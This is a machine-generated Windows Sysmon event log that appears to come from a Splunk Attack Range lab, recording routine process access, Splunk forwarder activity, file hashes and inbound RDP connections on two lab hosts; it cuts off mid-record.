08:59:45.448{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:45.448{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8801-6151-DF79-00000000FC01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:45.427{5EBD8912-8801-6151-DF79-00000000FC01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:45.027{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56646E94DC7CA27D34C141FBFE31DDF7,SHA256=78DC2276E6B4365D9B3A7729ACC0F578555599C8FFD6644818B1E8C5F8FCF921,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:44.092{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55307-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001047637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.147{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8802-6151-E079-00000000FC01}4304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.145{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.144{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.144{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.144{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8802-6151-E079-00000000FC01}4304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.144{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.144{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8802-6151-E079-00000000FC01}4304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.126{5EBD8912-8802-6151-E079-00000000FC01}4304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.047{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21F305F6662A8ABAA18A3D886387DF4D,SHA256=0747354B555EAB5783357E5D35948DB0EA1F99E57CDE98607F14BC7FEFFF4C45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976187Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:46.340{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4297MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976186Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:46.088{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE866EE7000E78EB1C4CD30F48946D1D,SHA256=27AA5D52A3909CF22F35B05C29802B22E2813F15A7B7C3B2372025E77A4F9C18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:47.151{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59847F7E91E8328AF638E5C313D9946B,SHA256=758B44A1BC1EF9D3362D8E4229CF918FD351C4DC99C6F38F4BC2E7662B126BAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:47.067{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC0FCDFA769160C45D2090C7546B1316,SHA256=7DD40B97B04E2CDE55CAF41950D96A35D585E3DD1224ECA486A6F1141922625E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976190Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:47.667{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BC0F392E2BD77D7A383D61760668880,SHA256=D6A571677F2614C2C85630D760AAB7082CE3AB8D243548B764581FAF0320FE3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976189Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:43.843{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59240-false10.0.1.12-8000- 23542300x8000000000000000976188Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:47.089{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F4EE23C8F6B08ADFB9480C100E72FB4,SHA256=5900110C3C14714EB1F0BA803BA80910D0B53D52F6E3FC39A9A6A087E8220030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:48.104{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0623F870490B24FFB39E43039F3E64A2,SHA256=7891E890D29F9BAE865EEA265F8FB5C8F846497114C56DB09A4DEF916BFFBF93,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976193Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:45.274{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-45441-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976192Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:44.942{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56505-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976191Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:48.105{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=517C6FFAA287CC9A90517717B97F4306,SHA256=A876C285A48B3BA78FA03CCBBE906A5BA69580A726273F5DE2AE38DE375BD3B9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:46.927{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49199-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:49.134{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EFF91E2D040257339C21DAFDDF05EBC,SHA256=51D6C3A71D0DAA9651FB8CEEDC4E278B86DAE2CA020F5FECA5589A29B5FABEA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976196Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:49.402{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1E9922D944D0085AAC6AF0808F18C00,SHA256=EC575F2EDBFD385F245808FCB329D5609CC1867BAAD3A107C0F288F1728BDB13,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976195Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:45.692{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56943-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976194Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:49.121{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80F1089ED16F3839084180EDDCD5A2A1,SHA256=EF3446E97F0FE9A11236B1886F8FF51A8C251111E9A84A54519B8039443C11F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:50.234{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A34EED52F91A831F2316B0CB94061D5,SHA256=97A2BBC31C29C5A55AF75AFFD5BD0E62409C6089618D7B8C5FCCE684A0FB1564,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976197Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:50.136{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA9DC05F824BA19FA7BE93E2D6160ED4,SHA256=794D590044731E13A25302923B0CC0154D00183157F86F010D81FFA0F5DE5E40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:51.265{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE55BD6EF680EB04914922E3AEEC9846,SHA256=BF95D52228D7918D2099886D98C44558A047B023A49850673FBB0A7FA3152B9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976199Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:47.642{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-56171-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976198Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:51.136{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57768DFBCF4F24B2C3EE1287470CA6A1,SHA256=2AFD7C6FB133665575BC49A004899EFA3EA9B0404AD7EFE03399090E6A10E913,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:52.302{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCBA6EB994A4F66C13383D11AF90C517,SHA256=96C240FE9FF2EDF92E2564634D4CBBBC066185067E5000C6D1A55CF09446D168,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976200Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:52.152{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A71FC615FB10BCE9061ECD0F71F82A2,SHA256=938ABBE139FE970CAF0A15EF189649630823DCC6D1FAE5B00319BED3FAD550E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:53.317{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5E7FCD9D42D9D062A9BB94640F9E08B,SHA256=0C6AC8374EE9702E5032C41C7D2EE48F889320F0CA109F643537AB68763A4387,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976203Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:50.210{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-32831-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976202Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:49.889{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59241-false10.0.1.12-8000- 23542300x8000000000000000976201Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:53.152{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F46275730041E8874EA3D48EA5084A5,SHA256=BE810055A8AC00A602C13AB8F6541C1B4B74D9A41F1B486D1C50661A42D12170,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.900{5EBD8912-880A-6151-E279-00000000FC01}6126116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.732{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-880A-6151-E279-00000000FC01}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 